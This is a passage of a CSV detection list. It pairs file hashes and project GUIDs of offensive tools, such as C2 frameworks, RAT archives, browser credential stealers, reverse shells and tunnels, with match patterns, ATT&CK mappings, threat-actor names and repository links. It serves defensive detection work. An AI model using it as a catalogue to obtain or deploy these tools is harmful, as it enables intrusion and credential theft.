"*f754b58f7856cd66b9297531df8a2eb328c5d2468b1a9489f3aca538e85a6c9e*",".{0,1000}f754b58f7856cd66b9297531df8a2eb328c5d2468b1a9489f3aca538e85a6c9e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44164" "*f75750934e4291853a7f536ba36a8e478066105b7c2b8d256d4ecb17d8bc60ee*",".{0,1000}f75750934e4291853a7f536ba36a8e478066105b7c2b8d256d4ecb17d8bc60ee.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of 
hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","44165" "*f757dcfc3ab68b9af0445c5672dd92d8bc246b9135f2896aecbc6f3849f31ad8*",".{0,1000}f757dcfc3ab68b9af0445c5672dd92d8bc246b9135f2896aecbc6f3849f31ad8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44166" "*F7581FB4-FAF5-4CD0-888A-B588F5BC69CD*",".{0,1000}F7581FB4\-FAF5\-4CD0\-888A\-B588F5BC69CD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","44167" "*f75cca99da6b3693e3310767256f62228a4451435e4f4301fa7dc95bef9c92ff*",".{0,1000}f75cca99da6b3693e3310767256f62228a4451435e4f4301fa7dc95bef9c92ff.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","#filehash","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","44168" 
"*f7685768c93c8405a525090484261be417913ca2bcfdcce9596856dc3b5c64e0*",".{0,1000}f7685768c93c8405a525090484261be417913ca2bcfdcce9596856dc3b5c64e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44169" "*f76cc170f78f8eb5d9c264e92761e1ceb26a50672c8c3372a18113b51f1530b3*",".{0,1000}f76cc170f78f8eb5d9c264e92761e1ceb26a50672c8c3372a18113b51f1530b3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44170" "*f77bd4b1b89324c9b873cd5552249c0217d1fd82a317b88e9c78a59448192f87*",".{0,1000}f77bd4b1b89324c9b873cd5552249c0217d1fd82a317b88e9c78a59448192f87.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","44172" "*f782f45b12b4185bb97a35da2fac19b3bff53b2b6f98617cc130e756b37f92d4*",".{0,1000}f782f45b12b4185bb97a35da2fac19b3bff53b2b6f98617cc130e756b37f92d4.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","44173" "*f7845353ef571f06a7adcee718b59370c3f8717cfebe76fe1bbc08c59ab677eb*",".{0,1000}f7845353ef571f06a7adcee718b59370c3f8717cfebe76fe1bbc08c59ab677eb.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","44174" "*f7851e5b0bca91e7ae15d879a7c5be4f63014c2c4b85bc756f6eddcf8c1eaa39*",".{0,1000}f7851e5b0bca91e7ae15d879a7c5be4f63014c2c4b85bc756f6eddcf8c1eaa39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44175" "*f791fdf3865ad607dcc1f0d7f1cd52ff8eb6f976a9b6f3f48fe1b0c3d73e3fdc*",".{0,1000}f791fdf3865ad607dcc1f0d7f1cd52ff8eb6f976a9b6f3f48fe1b0c3d73e3fdc.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44176" "*f7999c6975478cdc9494892dd265cd24801576f46b33bb72cc9c942424d63e4b*",".{0,1000}f7999c6975478cdc9494892dd265cd24801576f46b33bb72cc9c942424d63e4b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44177" "*f7a755d30fe841ce34b0ef2f4bd3265fab3623945636267c3d5d67c111a9a2a3*",".{0,1000}f7a755d30fe841ce34b0ef2f4bd3265fab3623945636267c3d5d67c111a9a2a3.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","44180" "*f7acfd4b4ec7466d926ca0fff2d3172b73bf64247a8d7a560eabafefc03c2d2b*",".{0,1000}f7acfd4b4ec7466d926ca0fff2d3172b73bf64247a8d7a560eabafefc03c2d2b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44182" "*f7b0550a05c30a38b721f15f90e84f104a3f98e3e8db7af96e5a98e7b79ecc11*",".{0,1000}f7b0550a05c30a38b721f15f90e84f104a3f98e3e8db7af96e5a98e7b79ecc11.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44183" "*f7dc3c322ee7bb4d5f5b3ee99b8fefb47c6fccda3c112c4b2f4c36eae1a86247*",".{0,1000}f7dc3c322ee7bb4d5f5b3ee99b8fefb47c6fccda3c112c4b2f4c36eae1a86247.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","44187" "*f7dc6083af1eac05ea39386513b98d2942134e6e2c7e236e070c71d6469650a7*",".{0,1000}f7dc6083af1eac05ea39386513b98d2942134e6e2c7e236e070c71d6469650a7.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","44188" "*f7e5471eda155f8ff46a63d00cab80b18a7eb62cbd1865d30bcff1b074af1887*",".{0,1000}f7e5471eda155f8ff46a63d00cab80b18a7eb62cbd1865d30bcff1b074af1887.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens 
- FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","44189" "*F7FA0241-1143-475B-A49A-AF44FA2F1339*",".{0,1000}F7FA0241\-1143\-475B\-A49A\-AF44FA2F1339.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44192" "*f7fc11ecc6ad1d7dee2e475c187ecbd2d7e612df73cf7a395380c7ee187a1395*",".{0,1000}f7fc11ecc6ad1d7dee2e475c187ecbd2d7e612df73cf7a395380c7ee187a1395.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44193" "*f7ff8ee96535ad845f70c8a978366b33d7934132dda00de017fa5b09fd11a55a*",".{0,1000}f7ff8ee96535ad845f70c8a978366b33d7934132dda00de017fa5b09fd11a55a.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","#filehash","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","44195" 
"*f80044aa9f0d7d7f10b8655ca33b573f3c62983a74d5399e869653b323664066*",".{0,1000}f80044aa9f0d7d7f10b8655ca33b573f3c62983a74d5399e869653b323664066.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","44196" "*f80352d7f6c1eaac75ea3d252605a5b5e193683fbf743b40694a2d65e4a80537*",".{0,1000}f80352d7f6c1eaac75ea3d252605a5b5e193683fbf743b40694a2d65e4a80537.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44198" "*f80759c36daba1a58c631ee2c3bf26652a6a27774e9ffe3067addbc15754b2bd*",".{0,1000}f80759c36daba1a58c631ee2c3bf26652a6a27774e9ffe3067addbc15754b2bd.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44199" 
"*F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681*",".{0,1000}F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","44200" "*f80c3254650bae8f5efcc27f8b51d1b07d526dbd29291a8e5fdcef25ed0d0292*",".{0,1000}f80c3254650bae8f5efcc27f8b51d1b07d526dbd29291a8e5fdcef25ed0d0292.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44201" "*f80dcd0195952b3bed5899824560e51e26cde9ec9974acbf1751d3ba845e5232*",".{0,1000}f80dcd0195952b3bed5899824560e51e26cde9ec9974acbf1751d3ba845e5232.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44202" "*f80ec70060c69474dacfc625375022594a7089ec7e18c75ff4c070c4b5d3187e*",".{0,1000}f80ec70060c69474dacfc625375022594a7089ec7e18c75ff4c070c4b5d3187e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44203" "*f80eda59c7a3c13a369756294727a931e983916bdbd1b9b0b4e010b84d6ce450*",".{0,1000}f80eda59c7a3c13a369756294727a931e983916bdbd1b9b0b4e010b84d6ce450.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44204" "*f80f4c638c843e17f384851f397322eaec414b3718ce79056abc15a6644f466f*",".{0,1000}f80f4c638c843e17f384851f397322eaec414b3718ce79056abc15a6644f466f.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","44205" "*f8184ce6c3b95b88dda27b246cff8039986843082f8689081c97d59161bc878d*",".{0,1000}f8184ce6c3b95b88dda27b246cff8039986843082f8689081c97d59161bc878d.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#filehash","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","44208" "*f81c31e5e8218f50da67495708f52079f59c0d96071f553086660fb47ff78e1c*",".{0,1000}f81c31e5e8218f50da67495708f52079f59c0d96071f553086660fb47ff78e1c.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","#filehash","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","44210" "*f81c9762e91fbd65cd1a3ca1098b36cba4c07f1eeebb4476900b312c955e30e0*",".{0,1000}f81c9762e91fbd65cd1a3ca1098b36cba4c07f1eeebb4476900b312c955e30e0.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","44211" "*f8226a0991ddf508b895d10a3fc5e6bc66ba20bb77f549140f7ac5e95c73817d*",".{0,1000}f8226a0991ddf508b895d10a3fc5e6bc66ba20bb77f549140f7ac5e95c73817d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER 
BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44212" "*f8240f1a0ce4d4a1ec3e880c7bc56fee6c3c790d48ec20bc35ac5ffad8861798*",".{0,1000}f8240f1a0ce4d4a1ec3e880c7bc56fee6c3c790d48ec20bc35ac5ffad8861798.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44213" "*F8285C79-AAC0-4FAD-B1DA-15CB4514B1D8*",".{0,1000}F8285C79\-AAC0\-4FAD\-B1DA\-15CB4514B1D8.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","#GUIDproject","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","44214" "*f82cb120b7c3c7ef03c656790fa81118e5e6cab286c458bdcc45220bbc5507dd*",".{0,1000}f82cb120b7c3c7ef03c656790fa81118e5e6cab286c458bdcc45220bbc5507dd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44215" "*F8317556-F82B-4FE2-9857-3E8DE896AA32*",".{0,1000}F8317556\-F82B\-4FE2\-9857\-3E8DE896AA32.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp 
but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#GUIDproject","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","44217" "*f833fdd261a1135db87bf4e5cac17447a2d837f6b43513bffae389cc8a8ae00e*",".{0,1000}f833fdd261a1135db87bf4e5cac17447a2d837f6b43513bffae389cc8a8ae00e.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44218" "*F835A9E7-2542-45C2-9D85-EC0C9FDFFB16*",".{0,1000}F835A9E7\-2542\-45C2\-9D85\-EC0C9FDFFB16.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#GUIDproject","N/A","10","","N/A","","","","44219" "*f841359414535455c39fc29a869f0d3f7e0299282699ece7a9d40389d921bba6*",".{0,1000}f841359414535455c39fc29a869f0d3f7e0299282699ece7a9d40389d921bba6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44221" "*f844a6b49da27594cf1733faeebac268c7c790c48f8c5bb89dfc1bc7c20d1e76*",".{0,1000}f844a6b49da27594cf1733faeebac268c7c790c48f8c5bb89dfc1bc7c20d1e76.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle 
(mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","44222" "*f84ba2c3ac92224b589b71f529440c6ad641b76418f90059753857b9261580b1*",".{0,1000}f84ba2c3ac92224b589b71f529440c6ad641b76418f90059753857b9261580b1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44223" "*f84e42c96d58d814d41f2301f242cb7ad50f0992509fd73562a60afb5449c87f*",".{0,1000}f84e42c96d58d814d41f2301f242cb7ad50f0992509fd73562a60afb5449c87f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44224" "*f85309eaf180124b677cd1fc086b3357b607b33482a8e562cfec767e4572bf01*",".{0,1000}f85309eaf180124b677cd1fc086b3357b607b33482a8e562cfec767e4572bf01.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 